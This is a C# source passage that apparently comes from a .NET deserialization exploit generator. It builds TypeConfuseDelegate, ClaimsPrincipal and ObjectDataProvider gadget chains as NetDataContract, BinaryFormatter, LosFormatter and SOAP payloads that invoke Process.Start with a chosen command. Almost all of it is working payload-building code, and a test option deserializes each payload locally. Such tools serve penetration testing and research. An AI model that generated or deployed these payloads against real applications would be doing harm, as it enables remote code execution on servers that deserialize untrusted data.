                cmdPart = "<c:string>" + inputArgs.CmdArguments + "</c:string><c:string>" + inputArgs.CmdFileName + "</c:string>";
            }
            else
            {
                cmdPart = @"<c:string a:nil=""true""/><c:string>" + inputArgs.CmdFileName + "</c:string>";
            }
            ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]"" b:Assembly=""System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089""><Count b:Type=""System.Int32"" b:Assembly=""0"">2</Count><Comparer b:Type=""System.Collections.Generic.ComparisonComparer`1[[System.String,mscorlib]]"" b:Assembly=""0""><_comparison b:FactoryType=""d:DelegateSerializationHolder"" b:Type=""System.DelegateSerializationHolder"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Collections.Generic"" xmlns:d=""http://schemas.datacontract.org/2004/07/System""><Delegate b:Type=""System.DelegateSerializationHolder+DelegateEntry"" b:Assembly=""0"" xmlns=""""><d:assembly b:Id=""1"">mscorlib</d:assembly><d:delegateEntry><d:assembly b:Ref=""1"" a:nil=""1""/><d:delegateEntry a:nil=""1""/><d:methodName b:Id=""2"">Compare</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Ref=""1"" a:nil=""1""/><d:targetTypeName b:Id=""3"">System.String</d:targetTypeName><d:type>System.Comparison`1[[System.String,mscorlib]]</d:type></d:delegateEntry><d:methodName b:Id=""4"">Start</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Id=""5"">System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089</d:targetTypeAssembly><d:targetTypeName b:Id=""6"">System.Diagnostics.Process</d:targetTypeName><d:type>System.Func`3[[System.String,mscorlib],[System.String,mscorlib],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]</d:type></Delegate><method0 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""4"" a:nil=""1""/><AssemblyName b:Ref=""5"" a:nil=""1""/><ClassName b:Ref=""6"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">System.Diagnostics.Process Start(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType><GenericArguments a:nil=""1""/></method0><method1 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""2"" a:nil=""1""/><AssemblyName b:Ref=""1"" a:nil=""1""/><ClassName b:Ref=""3"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">Int32 Compare(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType></method1></_comparison></Comparer><Version b:Type=""System.Int32"" b:Assembly=""0"">2</Version><Items b:Type=""System.String[]"" b:Assembly=""0"" b:Size=""2"">" + cmdPart + @"</Items></c:anyType></Values></Table></w>";
        }
        else
        {
            ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator();
            string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString();
            if (inputArgs.Minify)
            {
                xaml_payload = XMLMinifier.Minify(xaml_payload, null, null);
            }
            // The XAML is embedded as a CDATA section, so it is not XML-escaped here.
            ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"" b:Assembly=""Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""><ForegroundBrush b:Type=""System.String"" b:Assembly=""0""><![CDATA[" + xaml_payload + @"]]></ForegroundBrush></c:anyType></Values></Table></w>";
            //</Values></Table></w> can also be removed to make it even shorter! Why? IDK atm!
        }
        if (inputArgs.Minify)
        {
            // Both calls pass the closing "</Values></Table></w>" run to the minifier; with
            // UseSimpleType the two assembly names are passed as well.
            if (inputArgs.UseSimpleType)
            {
                ndcPayload = XMLMinifier.Minify(ndcPayload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
            }
            else
            {
                ndcPayload = XMLMinifier.Minify(ndcPayload, null, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true);
            }
        }
        if (inputArgs.Test)
        {
            // Self-test: hands the payload to the project's deserialization helper in this
            // process.
            try
            {
                SerializersHelper.NetDataContractSerializer_deserialize(ndcPayload);
                /*
                 * MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(ndcPayload));
                 * ms.Position = 0;
                 * ndcs.Deserialize(ms);
                 */
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return(ndcPayload);
        //return Serialize(myResourceSet, formatter, inputArgs);
    }
    else
    {
        throw new Exception("Formatter not supported");
    }
}
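/// <summary>
/// Wraps the BinaryFormatter output of TypeConfuseDelegateGenerator, base64-encoded, as the
/// <c>m_serializedClaimsIdentities</c> member of a System.Security.Claims.ClaimsPrincipal
/// written from a template for the requested formatter.
/// </summary>
/// <param name="formatter">
/// "binaryformatter", "losformatter" or "soapformatter", compared case-insensitively.
/// </param>
/// <param name="inputArgs">
/// Passed to the inner generator; its Minify and Test switches are read below.
/// </param>
/// <returns>
/// A byte[] for binaryformatter and losformatter; a SOAP XML string for soapformatter.
/// </returns>
/// <exception cref="Exception">The formatter name is none of the three listed above.</exception>
/// <remarks>
/// The inner payload is generated before the formatter name is checked.
/// When <c>inputArgs.Test</c> is set, the finished payload is deserialized in this process with
/// the matching formatter, so whatever it encodes is triggered on the machine running the
/// generator; exceptions from that step are passed to Debugging.ShowErrors and not rethrown.
/// A ClaimsPrincipal whose <c>m_serializedClaimsIdentities</c> member holds a base64 blob is the
/// marker to look for when inspecting untrusted serialized input.
/// </remarks>
public override object Generate(string formatter, InputArgs inputArgs)
{
    byte[] rceGadget = (byte[])(new TypeConfuseDelegateGenerator()).GenerateWithNoTest("BinaryFormatter", inputArgs);
    string b64encoded = Convert.ToBase64String(rceGadget);

    bool isBinaryFormatter = formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase);
    bool isLosFormatter = formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase);

    if (isBinaryFormatter || isLosFormatter)
    {
        string payload_bf_json = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 1, 'name': 'System.Security.Claims.ClaimsPrincipal', 'numMembers': 1, 'memberNames':['m_serializedClaimsIdentities'], 'binaryTypeEnumA':[1], 'typeInformationA':[null], 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 0 }},{'Id': 10, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 5, 'value': '" + b64encoded + @"' }},{'Id': 11, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]";

        MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(payload_bf_json);

        if (isBinaryFormatter)
        {
            if (inputArgs.Test)
            {
                // Self-test: deserializes the payload in this process, which triggers it here.
                try
                {
                    ms.Position = 0;
                    System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
                    bf.Deserialize(ms);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return ms.ToArray();
        }
        else
        {
            // it is LosFormatter: the BinaryFormatter bytes are converted, not regenerated.
            byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms.ToArray());
            MemoryStream ms2 = new MemoryStream(lfSerializedObj);
            ms2.Position = 0;
            if (inputArgs.Test)
            {
                // Self-test: deserializes the payload in this process, which triggers it here.
                try
                {
                    System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter();
                    lf.Deserialize(ms2);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return lfSerializedObj;
        }
    }
    // Ordinal, case-insensitive comparison like the two checks above; the previous
    // ToLower().Equals(...) form depended on the current culture.
    else if (formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
    {
        string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""> <SOAP-ENV:Body> <a1:ClaimsPrincipal id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/ns/System.Security.Claims""> <m_serializedClaimsIdentities id=""ref-5"">{b64encoded}</m_serializedClaimsIdentities> </a1:ClaimsPrincipal> </SOAP-ENV:Body> </SOAP-ENV:Envelope> ";

        if (inputArgs.Minify)
        {
            payload = XMLMinifier.Minify(payload, null, null, FormatterType.SoapFormatter);
        }

        if (inputArgs.Test)
        {
            // Self-test: hands the payload to the project's deserialization helper in this
            // process.
            try
            {
                SerializersHelper.SoapFormatter_deserialize(payload);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
        return payload;
    }
    else
    {
        throw new Exception("Formatter not supported");
    }
}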
// Scratch method: holds a hand-edited JSON record list for the TypeConfuseDelegate stream,
// converts it to a BinaryFormatter stream and then to LosFormatter text, prints the length
// of that text and deserializes it in this process.
// The command values are hard-coded in the literal ('/foo bar' at objectId 6 and
// 'TestConsoleApp_YSONET' at objectId 7); nothing is read from arguments here.
// The two comment toggles ("/* ... //*/" and "//* ... //*/") select which half is compiled:
// as written, the first half is commented out and the second half is live.
private void ManualTCDGPayload4Minifying()
{
    /*
     * Disabled half: presumably how the JSON below was first obtained - generate the
     * BinaryFormatter bytes, convert them to JSON and print them for manual editing.
     *
     * sampleInputArgs.Minify = true;
     * sampleInputArgs.UseSimpleType = true;
     *
     * object tcd = TypeConfuseDelegateGenerator.TypeConfuseDelegateGadget(sampleInputArgs);
     *
     * TypeConfuseDelegateGenerator tcdg = new TypeConfuseDelegateGenerator();
     * byte[] tcd_bf_byte = (byte[]) tcdg.GenerateWithNoTest("binaryformatter", sampleInputArgs);
     * string tcd_json = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte),false, true);
     * Console.WriteLine(tcd_json);
     * //*/

    //*
    // Record list consumed by AdvancedBinaryFormatterParser.JsonToStream. The type and
    // member names that appear as strings in it (SortedSet, ComparisonComparer,
    // DelegateSerializationHolder, System.Diagnostics.Process, Start) are what the
    // resulting stream carries.
    string tcd_json = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'Assembly', 'Data': { '$type': 'BinaryAssembly', 'assemId': 2, 'assemblyString': 'System' }},{'Id': 3, 'TypeName': 'ObjectWithMapTypedAssemId', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 5, 'objectId': 1, 'name': 'System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]', 'numMembers': 4, 'memberNames':['Count','Comparer','Version','Items'], 'binaryTypeEnumA':[0,1,0,1], 'typeInformationA': null, 'typeInformationB':[8,null,8,null], 'memberAssemIds':[0,0,0,0], 'assemId': 2 }},{'Id': 4, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 2 }},{'Id': 5, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 3 }},{'Id': 6, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 7, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 4 }},{'Id': 8, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 3, 'name': 'System.Collections.Generic.ComparisonComparer`1[[System.String]]', 'numMembers': 1, 
'memberNames':['_comparison'], 'binaryTypeEnumA':[1], 'typeInformationA': null, 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 0 }},{'Id': 9, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 5 }},{'Id': 10, 'TypeName': 'ArraySingleString', 'Data': { '$type': 'BinaryArray', 'objectId': 4, 'rank': 0, 'lengthA':[2], 'lowerBoundA': null, 'binaryTypeEnum': 0, 'typeInformation': null, 'assemId': 0, 'binaryHeaderEnum': 17, 'binaryArrayTypeEnum': 0 }},{'Id': 11, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 6, 'value': '/foo bar' }},{'Id': 12, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 7, 'value': 'TestConsoleApp_YSONET' }},{'Id': 13, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 5, 'name': 'System.DelegateSerializationHolder', 'numMembers': 3, 'memberNames':['Delegate','','x'], 'binaryTypeEnumA':[1,1,1], 'typeInformationA': null, 'typeInformationB':[null,null,null], 'memberAssemIds':[0,0,0], 'assemId': 0 }},{'Id': 14, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 8 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 17, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 8, 'name': 'System.DelegateSerializationHolder+DelegateEntry', 'numMembers': 7, 'memberNames':['type','assembly','','targetTypeAssembly','targetTypeName','methodName','delegateEntry'], 'binaryTypeEnumA':[1,1,1,1,1,1,1], 'typeInformationA': null, 'typeInformationB':[null,null,null,null,null,null,null], 'memberAssemIds':[0,0,0,0,0,0,0], 'assemId': 0 }},{'Id': 18, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 11, 'value': 
'System.Func`3[[System.String],[System.String],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]' }},{'Id': 19, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 12, 'value': 'mscorlib' }},{'Id': 20, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 21, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 13, 'value': 'System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089' }},{'Id': 22, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 14, 'value': 'System.Diagnostics.Process' }},{'Id': 23, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 15, 'value': 'Start' }},{'Id': 24, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 16 }},{'Id': 25, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 9, 'name': 'x', 'numMembers': 7, 'memberNames':['','','','','','',''], 'binaryTypeEnumA':[1,1,1,1,1,0,1], 'typeInformationA': null, 'typeInformationB':[null,null,null,null,null,8,null], 'memberAssemIds':[0,0,0,0,0,0,0], 'assemId': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 31, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 33, 'TypeName': 'Object', 'Data': { '$type': 'BinaryObject', 'objectId': 10, 'mapId': 9 }},{'Id': 34, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 
'objectId': 22, 'value': 'Compare' }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 36, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 24, 'value': 'System.String' }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 39, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 40, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 41, 'TypeName': 'Object', 'Data': { '$type': 'BinaryObject', 'objectId': 16, 'mapId': 8 }},{'Id': 42, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 27, 'value': 'System.Comparison`1[[System.String]]' }},{'Id': 43, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 12 }},{'Id': 44, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 45, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 12 }},{'Id': 46, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 24 }},{'Id': 47, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 22 }},{'Id': 49, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]";
    MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(tcd_json);
    try
    {
        // The LosFormatter output is decoded as UTF-8 text before its length is printed.
        string lfStr = Encoding.UTF8.GetString(SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms).ToArray());
        Console.WriteLine("Length: " + lfStr.Length);
        // Deserializes the converted stream in this process.
        SerializersHelper.LosFormatter_deserialize(lfStr);
    }
    catch
    {
        // Any failure (conversion or deserialization) is reduced to this one word;
        // the exception itself is discarded.
        Console.WriteLine("Error");
    }
    //*/
}
/// <summary>
/// Produces the TypeConfuseDelegate payload for the requested formatter. When both
/// <c>inputArgs.Minify</c> and <c>inputArgs.UseSimpleType</c> are set and the formatter is
/// BinaryFormatter or LosFormatter, a hand-minified JSON record list is used instead of
/// serializing the gadget object; every other case goes through <c>Serialize</c>.
/// </summary>
/// <param name="formatter">Formatter name; the minified path matches "binaryformatter" and "LosFormatter" case-insensitively.</param>
/// <param name="inputArgs">
/// Generation options. On the minified path this method sets <c>CmdType</c> on the caller's
/// object and reads <c>CmdArguments</c>, <c>CmdFileName</c> and <c>Test</c>.
/// </param>
/// <returns>
/// A <c>byte[]</c> on the minified path; otherwise whatever <c>Serialize</c> returns.
/// </returns>
/// <remarks>
/// When <c>inputArgs.Test</c> is set, the generated stream is deserialized in this process;
/// exceptions from that step go to <c>Debugging.ShowErrors</c> and the payload is still returned.
/// </remarks>
public override object Generate(string formatter, InputArgs inputArgs)
{
    if (inputArgs.Minify && inputArgs.UseSimpleType && (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase) || formatter.Equals("LosFormatter", StringComparison.OrdinalIgnoreCase)))
    {
        // This is to provide even a smaller payload
        // NOTE(review): CmdArguments and CmdFileName are concatenated below into
        // single-quoted JSON string values with no escaping at this site. Presumably
        // setting CmdType to JSON makes those properties return JSON-escaped text -
        // confirm in InputArgs. The assignment also changes the caller's inputArgs.
        inputArgs.CmdType = CommandArgSplitter.CommandType.JSON;
        string tcd_json_minified = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'Assembly', 'Data': { '$type': 'BinaryAssembly', 'assemId': 2, 'assemblyString': 'System' }},{'Id': 3, 'TypeName': 'ObjectWithMapTypedAssemId', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 5, 'objectId': 1, 'name': 'System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]', 'numMembers': 4, 'memberNames':['Count','Comparer','Version','Items'], 'binaryTypeEnumA':[0,1,0,1], 'typeInformationA': null, 'typeInformationB':[8,null,8,null], 'memberAssemIds':[0,0,0,0], 'assemId': 2 }},{'Id': 4, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 2 }},{'Id': 5, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 3 }},{'Id': 6, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 7, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 4 }},{'Id': 8, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 3, 'name': 'System.Collections.Generic.ComparisonComparer`1[[System.String]]', 'numMembers': 1, 'memberNames':['_comparison'], 'binaryTypeEnumA':[1], 'typeInformationA': null, 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 0 }},{'Id': 9, 'TypeName': 
'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 5 }},{'Id': 10, 'TypeName': 'ArraySingleString', 'Data': { '$type': 'BinaryArray', 'objectId': 4, 'rank': 0, 'lengthA':[2], 'lowerBoundA': null, 'binaryTypeEnum': 0, 'typeInformation': null, 'assemId': 0, 'binaryHeaderEnum': 17, 'binaryArrayTypeEnum': 0 }},{'Id': 11, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 6, 'value': '" + inputArgs.CmdArguments + @"' }},{'Id': 12, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 7, 'value': '" + inputArgs.CmdFileName + @"' }},{'Id': 13, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 5, 'name': 'System.DelegateSerializationHolder', 'numMembers': 3, 'memberNames':['Delegate','','x'], 'binaryTypeEnumA':[1,1,1], 'typeInformationA': null, 'typeInformationB':[null,null,null], 'memberAssemIds':[0,0,0], 'assemId': 0 }},{'Id': 14, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 8 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 17, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 8, 'name': 'System.DelegateSerializationHolder+DelegateEntry', 'numMembers': 7, 'memberNames':['type','assembly','','targetTypeAssembly','targetTypeName','methodName','delegateEntry'], 'binaryTypeEnumA':[1,1,1,1,1,1,1], 'typeInformationA': null, 'typeInformationB':[null,null,null,null,null,null,null], 'memberAssemIds':[0,0,0,0,0,0,0], 'assemId': 0 }},{'Id': 18, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 11, 'value': 'System.Func`3[[System.String],[System.String],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]' }},{'Id': 19, 'TypeName': 
'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 12, 'value': 'mscorlib' }},{'Id': 20, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 21, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 13, 'value': 'System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089' }},{'Id': 22, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 14, 'value': 'System.Diagnostics.Process' }},{'Id': 23, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 15, 'value': 'Start' }},{'Id': 24, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 16 }},{'Id': 25, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 9, 'name': 'x', 'numMembers': 7, 'memberNames':['','','','','','',''], 'binaryTypeEnumA':[1,1,1,1,1,0,1], 'typeInformationA': null, 'typeInformationB':[null,null,null,null,null,8,null], 'memberAssemIds':[0,0,0,0,0,0,0], 'assemId': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 31, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 33, 'TypeName': 'Object', 'Data': { '$type': 'BinaryObject', 'objectId': 10, 'mapId': 9 }},{'Id': 34, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 22, 'value': 'Compare' }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 36, 'TypeName': 'ObjectString', 'Data': { 
